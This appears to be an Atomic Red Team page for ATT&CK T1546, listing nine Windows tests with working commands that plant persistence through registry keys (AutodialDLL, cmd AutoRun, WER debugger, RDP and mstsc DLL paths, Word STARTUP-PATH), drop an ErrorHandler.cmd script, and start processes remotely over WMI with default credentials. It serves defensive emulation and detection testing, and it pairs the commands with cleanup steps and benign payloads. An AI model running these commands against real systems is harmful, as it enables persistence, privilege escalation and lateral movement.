# T1546 - Event Triggered Execution ## Description from ATT&CK > Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001) > > Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware) > > Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. [Source](https://attack.mitre.org/techniques/T1546) ## Atomic Tests - [Atomic Test #1: Persistence with Custom AutodialDLL](#atomic-test-1-persistence-with-custom-autodialdll) - [Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)](#atomic-test-2-hklm---persistence-using-commandprocessor-autorun-key-with-elevation) - [Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)](#atomic-test-3-hkcu---persistence-using-commandprocessor-autorun-key-without-elevation) - [Atomic Test #4: WMI Invoke-CimMethod Start Process](#atomic-test-4-wmi-invoke-cimmethod-start-process) - [Atomic Test #5: Adding custom debugger for Windows Error Reporting](#atomic-test-5-adding-custom-debugger-for-windows-error-reporting) - [Atomic Test #6: Load custom DLL on mstsc execution](#atomic-test-6-load-custom-dll-on-mstsc-execution) - [Atomic Test #7: Persistence using automatic execution of custom DLL during RDP session](#atomic-test-7-persistence-using-automatic-execution-of-custom-dll-during-rdp-session) - [Atomic Test #8: Persistence via ErrorHandler.cmd script execution](#atomic-test-8-persistence-via-errorhandlercmd-script-execution) - [Atomic Test #9: Persistence using STARTUP-PATH in MS-WORD](#atomic-test-9-persistence-using-startup-path-in-ms-word) ### Atomic Test #1: Persistence with Custom AutodialDLL The DLL pointed to by the AutodialDLL registry key is loaded every time a process connects to the internet. Attackers can gain persistent code execution by setting this key to a DLL of their choice. The sample dll provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping a web browser such as MS Edge or Chrome should result in the dll executing. [Blog](https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/) **Supported Platforms:** Windows **auto_generated_guid:** `aca9ae16-7425-4b6d-8c30-cad306fdbd5b` #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll ``` #### Cleanup Commands ```powershell Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value $env:windir\system32\rasadhlp.dll ``` #### Dependencies: Run with `powershell`! ##### Description: AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll ###### Check Prereq Commands ```powershell if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll) { exit 0} else { exit 1} ``` ###### Get Prereq Commands ```powershell New-Item -Type Directory "PathToAtomicsFolder\T1546\bin\" -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546/bin/AltWinSock2DLL.dll" -OutFile "PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll" ``` ### Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed. [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433) **Supported Platforms:** Windows **auto_generated_guid:** `a574dafe-a903-4cce-9701-14040f4f3532` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | command | Command to Execute | string | notepad.exe| #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String" ``` #### Cleanup Commands ```powershell Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore ``` ### Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed. [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433) **Supported Platforms:** Windows **auto_generated_guid:** `36b8dbf9-59b1-4e9b-a3bb-36e80563ef01` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | command | Command to Execute | string | notepad.exe| #### Attack Commands: Run with `powershell`! ```powershell $path = "HKCU:\Software\Microsoft\Command Processor" if (!(Test-Path -path $path)){ New-Item -ItemType Key -Path $path } New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String" ``` #### Cleanup Commands ```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore ``` ### Atomic Test #4: WMI Invoke-CimMethod Start Process The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod. This is a novel way to perform lateral movement or to start a remote process. This does require WinRM to be enabled. The account performing the run will also need to be elevated. A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process. **Supported Platforms:** Windows **auto_generated_guid:** `adae83d3-0df6-45e7-b2c3-575f91584577` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dest | destination computer name | string | localhost| | password | password for account | string | P@ssword1| | username | account to use | string | Administrator| | process | process to spawn | string | calc.exe| #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell # Set the remote computer name and credentials $RemoteComputer = "#{dest}" $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword # Create a CIM session $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential # Define the process you want to start $ProcessToStart = "#{process}" # Invoke the Create method on the Win32_Process class to start the process $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart} # Check the result if ($Result.ReturnValue -eq 0) { Write-Host "Process started successfully with Process ID: $($Result.ProcessId)" } else { Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)" } # Clean up the CIM session Remove-CimSession -CimSession $CimSession ``` ### Atomic Test #5: Adding custom debugger for Windows Error Reporting When applications hang, the Windows Error Reporting framework allows us to attach a debugger, if it is set up in the Registry. Adding executable of choice will let the executable to auto-execute when during any application crash due to functioning of WER framework **Supported Platforms:** Windows **auto_generated_guid:** `17d1a3cc-3373-495a-857a-e5dd005fb302` #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg add "HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs" /v Debugger /t REG_SZ /d "C:\Windows\System32\notepad.exe" /f ``` #### Cleanup Commands ```cmd reg delete "HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs" /v Debugger /f ``` ### Atomic Test #6: Load custom DLL on mstsc execution Adding ClxDllPath under Terminal Server Client subkey of HKLM hive with a path to custom DLL allows for DLL loading during execution of mstsc.exe **Supported Platforms:** Windows **auto_generated_guid:** `2db7852e-5a32-4ec7-937f-f4e027881700` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_inf | custom DLL to be executed | Path | C:\Windows\System32\amsi.dll| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg add "HKLM\SOFTWARE\Microsoft\Terminal Server Client" /v ClxDllPath /t REG_SZ /d "#{dll_inf}" /f ``` #### Cleanup Commands ```cmd reg delete "HKLM\SOFTWARE\Microsoft\Terminal Server Client" /v ClxDllPath /f ``` ### Atomic Test #7: Persistence using automatic execution of custom DLL during RDP session When remote desktop session is accepted, the system queries the key it queries the Registry key:HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin. If such key exists, the OS will attempt to read the Path value underneath.Once the Path is read, the DLL that it points to will be loaded via LoadLibrary. **Supported Platforms:** Windows **auto_generated_guid:** `b7fc4c3f-fe6e-479a-ba27-ef91b88536e3` #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin" /v Path /t REG_SZ /d "C:\Windows\System32\amsi.dll" /f ``` #### Cleanup Commands ```cmd reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin" /f ``` ### Atomic Test #8: Persistence via ErrorHandler.cmd script execution Create persistence by triggering script within ErrorHandler.cmd upon the execution of specific binaries within the oobe directory. Upon test execution, Setup.exe will be executed to further execute script within ErrorHandlercmd to launch Notepad. **Supported Platforms:** Windows **auto_generated_guid:** `547a4736-dd1c-4b48-b4fe-e916190bb2e7` #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Copy-Item -Path PathToAtomicsFolder\T1546\src\ErrorHandler.cmd -Destination C:\Windows\Setup\Scripts\ErrorHandler.cmd C:\windows\System32\oobe\Setup ``` #### Cleanup Commands ```powershell Remove-Item C:\Windows\Setup\Scripts\ErrorHandler.cmd ``` #### Dependencies: Run with `powershell`! ##### Description: ErrorHandler.cmd script must exist on disk at specified at PathToAtomicsFolder\T1546\bin\ErrorHandler.cmd ###### Check Prereq Commands ```powershell if (Test-Path PathToAtomicsFolder\T1546\src\ErrorHandler.cmd) { exit 0} else { exit 1} ``` ###### Get Prereq Commands ```powershell New-Item -Type Directory "PathToAtomicsFolder\T1546\src\" -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546/src/ErrorHandler.cmd" -OutFile "PathToAtomicsFolder\T1546\src\ErrorHandler.cmd" ``` ### Atomic Test #9: Persistence using STARTUP-PATH in MS-WORD When Word starts, it searches for the registry key HKCU\Software\Microsoft\Office\\Word\Options\STARTUP-PATH and if it exists, it will treat it as a user specific start-up folder and load the contents of the folder with file extensions of .wll,.lnk,.dotm,.dot,.dotx The registry key can be abused to load malware from the mentioned path. Reboot might be required. **Supported Platforms:** Windows **auto_generated_guid:** `f0027655-25ef-47b0-acaf-3d83d106156c` #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg add "HKCU\Software\Microsoft\Office\16.0\Word\Options" /v STARTUP-PATH /t REG_SZ /d "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent" /f ``` #### Cleanup Commands ```cmd reg delete HKCU\Software\Microsoft\Office\16.0\Word\Options /v STARTUP-PATH /f ```